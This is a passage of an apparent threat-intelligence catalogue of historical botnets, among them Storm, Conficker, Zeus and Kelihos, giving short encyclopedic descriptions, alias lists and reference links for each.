<h3 id="_storm"><a class="anchor" href="#_storm"></a><a class="link" href="#_storm">Storm</a></h3>
<div class="paragraph">
<p>The Storm botnet or Storm worm botnet (also known as Dorf botnet and Ecard malware) is a remotely controlled network of "zombie" computers (or "botnet") that have been linked by the Storm Worm, a Trojan horse spread through e-mail spam. At its height in September 2007, the Storm botnet was running on anywhere from 1 million to 50 million computer systems, and accounted for 8% of all malware on Microsoft Windows computers. It was first identified around January 2007, having been distributed by email with subjects such as "230 dead as storm batters Europe," giving it its well-known name. The botnet began to decline in late 2007, and by mid-2008, had been reduced to infecting about 85,000 computers, far less than it had infected a year earlier.</p>
</div>
<div class="paragraph">
<p>Storm is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Nuwar</p>
</li>
<li>
<p>Peacomm</p>
</li>
<li>
<p>Zhelatin</p>
</li>
<li>
<p>Dorf</p>
</li>
<li>
<p>Ecard</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 468. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Storm_botnet">https://en.wikipedia.org/wiki/Storm_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rustock"><a class="anchor" href="#_rustock"></a><a class="link" href="#_rustock">Rustock</a></h3>
<div class="paragraph">
<p>Rustock is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RKRustok</p>
</li>
<li>
<p>Costrat</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 469. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Rustock_botnet">https://en.wikipedia.org/wiki/Rustock_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_donbot"><a class="anchor" href="#_donbot"></a><a class="link" href="#_donbot">Donbot</a></h3>
<div class="paragraph">
<p>Donbot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Buzus</p>
</li>
<li>
<p>Bachsoy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 470. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Donbot_botnet">https://en.wikipedia.org/wiki/Donbot_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cutwail"><a class="anchor" href="#_cutwail"></a><a class="link" href="#_cutwail">Cutwail</a></h3>
<div class="paragraph">
<p>The Cutwail botnet, founded around 2007, is a botnet mostly involved in sending spam e-mails. The bot is typically installed on infected machines by a Trojan component called Pushdo.] It affects computers running Microsoft Windows. related to: Wigon, Pushdo</p>
</div>
<div class="paragraph">
<p>Cutwail is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Pandex</p>
</li>
<li>
<p>Mutant</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 471. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Cutwail_botnet">https://en.wikipedia.org/wiki/Cutwail_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_akbot"><a class="anchor" href="#_akbot"></a><a class="link" href="#_akbot">Akbot</a></h3>
<div class="paragraph">
<p>Akbot was a computer virus that infected an estimated 1.3 million computers and added them to a botnet.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 472. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Akbot">https://en.wikipedia.org/wiki/Akbot</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_srizbi"><a class="anchor" href="#_srizbi"></a><a class="link" href="#_srizbi">Srizbi</a></h3>
<div class="paragraph">
<p>Srizbi BotNet, considered one of the world&#8217;s largest botnets, and responsible for sending out more than half of all the spam being sent by all the major botnets combined. The botnets consist of computers infected by the Srizbi trojan, which sent spam on command. Srizbi suffered a massive setback in November 2008 when hosting provider Janka Cartel was taken down; global spam volumes reduced up to 93% as a result of this action.</p>
</div>
<div class="paragraph">
<p>Srizbi is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cbeplay</p>
</li>
<li>
<p>Exchanger</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 473. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Srizbi_botnet">https://en.wikipedia.org/wiki/Srizbi_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lethic"><a class="anchor" href="#_lethic"></a><a class="link" href="#_lethic">Lethic</a></h3>
<div class="paragraph">
<p>The Lethic Botnet (initially discovered around 2008) is a botnet consisting of an estimated 210 000 - 310 000 individual machines which are mainly involved in pharmaceutical and replica spam. At the peak of its existence the botnet was responsible for 8-10% of all the spam sent worldwide.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 474. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Lethic_botnet">https://en.wikipedia.org/wiki/Lethic_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xarvester"><a class="anchor" href="#_xarvester"></a><a class="link" href="#_xarvester">Xarvester</a></h3>
<div class="paragraph">
<p>Xarvester is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Rlsloup</p>
</li>
<li>
<p>Pixoliz</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 475. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://krebsonsecurity.com/tag/xarvester/">https://krebsonsecurity.com/tag/xarvester/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sality"><a class="anchor" href="#_sality"></a><a class="link" href="#_sality">Sality</a></h3>
<div class="paragraph">
<p>Sality is the classification for a family of malicious software (malware), which infects files on Microsoft Windows systems. Sality was first discovered in 2003 and has advanced over the years to become a dynamic, enduring and full-featured form of malicious code. Systems infected with Sality may communicate over a peer-to-peer (P2P) network for the purpose of relaying spam, proxying of communications, exfiltrating sensitive data, compromising web servers and/or coordinating distributed computing tasks for the purpose of processing intensive tasks (e.g. password cracking). Since 2010, certain variants of Sality have also incorporated the use of rootkit functions as part of an ongoing evolution of the malware family. Because of its continued development and capabilities, Sality is considered to be one of the most complex and formidable forms of malware to date.</p>
</div>
<div class="paragraph">
<p>Sality is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sector</p>
</li>
<li>
<p>Kuku</p>
</li>
<li>
<p>Sality</p>
</li>
<li>
<p>SalLoad</p>
</li>
<li>
<p>Kookoo</p>
</li>
<li>
<p>SaliCode</p>
</li>
<li>
<p>Kukacka</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 476. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Sality">https://en.wikipedia.org/wiki/Sality</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mariposa"><a class="anchor" href="#_mariposa"></a><a class="link" href="#_mariposa">Mariposa</a></h3>
<div class="paragraph">
<p>The Mariposa botnet, discovered December 2008, is a botnet mainly involved in cyberscamming and denial-of-service attacks. Before the botnet itself was dismantled on 23 December 2009, it consisted of up to 12 million unique IP addresses or up to 1 million individual zombie computers infected with the "Butterfly (mariposa in Spanish) Bot", making it one of the largest known botnets.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 477. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Mariposa_botnet">https://en.wikipedia.org/wiki/Mariposa_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_conficker"><a class="anchor" href="#_conficker"></a><a class="link" href="#_conficker">Conficker</a></h3>
<div class="paragraph">
<p>Conficker, also known as Downup, Downadup and Kido, is a computer worm targeting the Microsoft Windows operating system that was first detected in November 2008. It uses flaws in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet, and has been unusually difficult to counter because of its combined use of many advanced malware techniques. The Conficker worm infected millions of computers including government, business and home computers in over 190 countries, making it the largest known computer worm infection since the 2003 Welchia.</p>
</div>
<div class="paragraph">
<p>Conficker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DownUp</p>
</li>
<li>
<p>DownAndUp</p>
</li>
<li>
<p>DownAdUp</p>
</li>
<li>
<p>Kido</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 478. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Conficker">https://en.wikipedia.org/wiki/Conficker</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_waledac"><a class="anchor" href="#_waledac"></a><a class="link" href="#_waledac">Waledac</a></h3>
<div class="paragraph">
<p>Waledac, also known by its aliases Waled and Waledpak, was a botnet mostly involved in e-mail spam and malware. In March 2010 the botnet was taken down by Microsoft.</p>
</div>
<div class="paragraph">
<p>Waledac is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Waled</p>
</li>
<li>
<p>Waledpak</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 479. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Waledac_botnet">https://en.wikipedia.org/wiki/Waledac_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_maazben"><a class="anchor" href="#_maazben"></a><a class="link" href="#_maazben">Maazben</a></h3>
<div class="paragraph">
<p>A new botnet, dubbed Maazben, has also been observed and is also growing rapidly. MessageLabs Intelligence has been tracking the growth of Maazben since its infancy in late May and early June. Its dominance in terms of the proportion of spam has been accelerating in the last 30 days from just over 0.5% of all spam, peaking at 4.5% of spam when it is most active. Currently spam from Maazben accounts for approximately 1.4% of all spam, but this is likely to increase significantly over time, particularly since both overall spam per minute sent and spam per bot per minute are increasing.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 480. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/evaluating-botnet-capacity">https://www.symantec.com/connect/blogs/evaluating-botnet-capacity</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_onewordsub"><a class="anchor" href="#_onewordsub"></a><a class="link" href="#_onewordsub">Onewordsub</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 481. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.botnets.fr/wiki/OneWordSub">https://www.botnets.fr/wiki/OneWordSub</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gheg"><a class="anchor" href="#_gheg"></a><a class="link" href="#_gheg">Gheg</a></h3>
<div class="paragraph">
<p>Tofsee, also known as Gheg, is another botnet analyzed by CERT Polska. Its main job is to send spam, but it is able to do other tasks as well. It is possible thanks to the modular design of this malware it consists of the main binary (the one user downloads and infects with), which later downloads several additional modules from the C2 server they modify code by overwriting some of the called functions with their own. An example of some actions these modules perform is spreading by posting click-bait messages on Facebook and VKontakte (Russian social network).</p>
</div>
<div class="paragraph">
<p>Gheg is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Tofsee</p>
</li>
<li>
<p>Mondera</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 482. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cert.pl/en/news/single/tofsee-en/">https://www.cert.pl/en/news/single/tofsee-en/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nucrypt"><a class="anchor" href="#_nucrypt"></a><a class="link" href="#_nucrypt">Nucrypt</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 483. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.botnets.fr/wiki.old/index.php?title=Nucrypt&amp;setlang=en">https://www.botnets.fr/wiki.old/index.php?title=Nucrypt&amp;setlang=en</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wopla"><a class="anchor" href="#_wopla"></a><a class="link" href="#_wopla">Wopla</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 484. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.botnets.fr/wiki.old/index.php/Wopla">https://www.botnets.fr/wiki.old/index.php/Wopla</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_asprox"><a class="anchor" href="#_asprox"></a><a class="link" href="#_asprox">Asprox</a></h3>
<div class="paragraph">
<p>The Asprox botnet (discovered around 2008), also known by its aliases Badsrc and Aseljo, is a botnet mostly involved in phishing scams and performing SQL injections into websites in order to spread malware.</p>
</div>
<div class="paragraph">
<p>Asprox is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Badsrc</p>
</li>
<li>
<p>Aseljo</p>
</li>
<li>
<p>Danmec</p>
</li>
<li>
<p>Hydraflux</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 485. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Asprox_botnet">https://en.wikipedia.org/wiki/Asprox_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spamthru"><a class="anchor" href="#_spamthru"></a><a class="link" href="#_spamthru">Spamthru</a></h3>
<div class="paragraph">
<p>Spam Thru represented an expontential jump in the level of sophistication and complexity of these botnets, harnessing a 70,000 strong peer to peer botnet seeded with the Spam Thru Trojan. Spam Thru is also known by the Aliases Backdoor.Win32.Agent.uu, Spam-DComServ and Troj_Agent.Bor. Spam Thru was unique because it had its own antivirus engine designed to remove any other malicious programs residing in the same infected host machine so that it can get unlimited access to the machines processing power as well as bandwidth. It also had the potential to be 10 times more productive than most other botnets while evading detection because of in-built defences.</p>
</div>
<div class="paragraph">
<p>Spamthru is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Spam-DComServ</p>
</li>
<li>
<p>Covesmer</p>
</li>
<li>
<p>Xmiler</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 486. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.root777.com/security/analysis-of-spam-thru-botnet/">http://www.root777.com/security/analysis-of-spam-thru-botnet/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gumblar"><a class="anchor" href="#_gumblar"></a><a class="link" href="#_gumblar">Gumblar</a></h3>
<div class="paragraph">
<p>Gumblar is a malicious JavaScript trojan horse file that redirects a user&#8217;s Google searches, and then installs rogue security software. Also known as Troj/JSRedir-R this botnet first appeared in 2009.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 487. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Gumblar">https://en.wikipedia.org/wiki/Gumblar</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bredolab"><a class="anchor" href="#_bredolab"></a><a class="link" href="#_bredolab">BredoLab</a></h3>
<div class="paragraph">
<p>The Bredolab botnet, also known by its alias Oficla, was a Russian botnet mostly involved in viral e-mail spam. Before the botnet was eventually dismantled in November 2010 through the seizure of its command and control servers, it was estimated to consist of millions of zombie computers.</p>
</div>
<div class="paragraph">
<p>BredoLab is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Oficla</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 488. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Bredolab_botnet">https://en.wikipedia.org/wiki/Bredolab_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_grum"><a class="anchor" href="#_grum"></a><a class="link" href="#_grum">Grum</a></h3>
<div class="paragraph">
<p>The Grum botnet, also known by its alias Tedroo and Reddyb, was a botnet mostly involved in sending pharmaceutical spam e-mails. Once the world&#8217;s largest botnet, Grum can be traced back to as early as 2008. At the time of its shutdown in July 2012, Grum was reportedly the world&#8217;s 3rd largest botnet, responsible for 18% of worldwide spam traffic.</p>
</div>
<div class="paragraph">
<p>Grum is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Tedroo</p>
</li>
<li>
<p>Reddyb</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 489. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Grum_botnet">https://en.wikipedia.org/wiki/Grum_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mega_d"><a class="anchor" href="#_mega_d"></a><a class="link" href="#_mega_d">Mega-D</a></h3>
<div class="paragraph">
<p>The Mega-D, also known by its alias of Ozdok, is a botnet that at its peak was responsible for sending 32% of spam worldwide.</p>
</div>
<div class="paragraph">
<p>Mega-D is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ozdok</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 490. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Mega-D_botnet">https://en.wikipedia.org/wiki/Mega-D_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kraken"><a class="anchor" href="#_kraken"></a><a class="link" href="#_kraken">Kraken</a></h3>
<div class="paragraph">
<p>The Kraken botnet was the world&#8217;s largest botnet as of April 2008. Researchers say that Kraken infected machines in at least 50 of the Fortune 500 companies and grew to over 400,000 bots. It was estimated to send 9 billion spam messages per day. Kraken botnet malware may have been designed to evade anti-virus software, and employed techniques to stymie conventional anti-virus software.</p>
</div>
<div class="paragraph">
<p>Kraken is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Kracken</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 491. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Kraken_botnet">https://en.wikipedia.org/wiki/Kraken_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_festi"><a class="anchor" href="#_festi"></a><a class="link" href="#_festi">Festi</a></h3>
<div class="paragraph">
<p>The Festi botnet, also known by its alias of Spamnost, is a botnet mostly involved in email spam and denial of service attacks.</p>
</div>
<div class="paragraph">
<p>Festi is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Spamnost</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 492. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Festi_botnet">https://en.wikipedia.org/wiki/Festi_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vulcanbot"><a class="anchor" href="#_vulcanbot"></a><a class="link" href="#_vulcanbot">Vulcanbot</a></h3>
<div class="paragraph">
<p>Vulcanbot is the name of a botnet predominantly spread in Vietnam, apparently with political motives. It is thought to have begun in late 2009.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 493. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Vulcanbot">https://en.wikipedia.org/wiki/Vulcanbot</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lowsec"><a class="anchor" href="#_lowsec"></a><a class="link" href="#_lowsec">LowSec</a></h3>
<div class="paragraph">
<p>LowSec is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>LowSecurity</p>
</li>
<li>
<p>FreeMoney</p>
</li>
<li>
<p>Ring0.Tools</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_tdl4"><a class="anchor" href="#_tdl4"></a><a class="link" href="#_tdl4">TDL4</a></h3>
<div class="paragraph">
<p>Alureon (also known as TDSS or TDL-4) is a trojan and bootkit created to steal data by intercepting a system&#8217;s network traffic and searching for: banking usernames and passwords, credit card data, PayPal information, social security numbers, and other sensitive user data. Following a series of customer complaints, Microsoft determined that Alureon caused a wave of BSoDs on some 32-bit Microsoft Windows systems. The update, MS10-015,triggered these crashes by breaking assumptions made by the malware author(s).</p>
</div>
<div class="paragraph">
<p>TDL4 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TDSS</p>
</li>
<li>
<p>Alureon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 494. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Alureon#TDL-4">https://en.wikipedia.org/wiki/Alureon#TDL-4</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeus_2"><a class="anchor" href="#_zeus_2"></a><a class="link" href="#_zeus_2">Zeus</a></h3>
<div class="paragraph">
<p>Zeus, ZeuS, or Zbot is a Trojan horse malware package that runs on versions of Microsoft Windows. While it can be used to carry out many malicious and criminal tasks, it is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing. It is also used to install the CryptoLocker ransomware. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009 security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek. Similarly to Koobface, Zeus has also been used to trick victims of tech support scams into giving the scam artists money through pop-up messages that claim the user has a virus, when in reality they might have no viruses at all. The scammers may use programs such as Command prompt or Event viewer to make the user believe that their computer is infected.</p>
</div>
<div class="paragraph">
<p>Zeus is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zbot</p>
</li>
<li>
<p>ZeuS</p>
</li>
<li>
<p>PRG</p>
</li>
<li>
<p>Wsnpoem</p>
</li>
<li>
<p>Gorhax</p>
</li>
<li>
<p>Kneber</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 495. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Zeus_(malware)">https://en.wikipedia.org/wiki/Zeus_(malware)</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kelihos"><a class="anchor" href="#_kelihos"></a><a class="link" href="#_kelihos">Kelihos</a></h3>
<div class="paragraph">
<p>The Kelihos botnet, also known as Hlux, is a botnet mainly involved in spamming and the theft of bitcoins.</p>
</div>
<div class="paragraph">
<p>Kelihos is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hlux</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 496. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Kelihos_botnet">https://en.wikipedia.org/wiki/Kelihos_botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ramnit_2"><a class="anchor" href="#_ramnit_2"></a><a class="link" href="#_ramnit_2">Ramnit</a></h3>
<div class="paragraph">
<p>Ramnit is a Computer worm affecting Windows users. It was estimated that it infected 800 000 Windows PCs between September and December 2011. The Ramnit botnet was dismantled by Europol and Symantec securities in 2015. In 2015, this infection was estimated at 3 200 000 PCs.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 497. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Botnet">https://en.wikipedia.org/wiki/Botnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zer0n3t"><a class="anchor" href="#_zer0n3t"></a><a class="link" href="#_zer0n3t">Zer0n3t</a></h3>
<div class="paragraph">
<p>Zer0n3t is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Fib3rl0g1c</p>
</li>
<li>
<p>Zer0n3t</p>
</li>
<li>
<p>Zer0Log1x</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
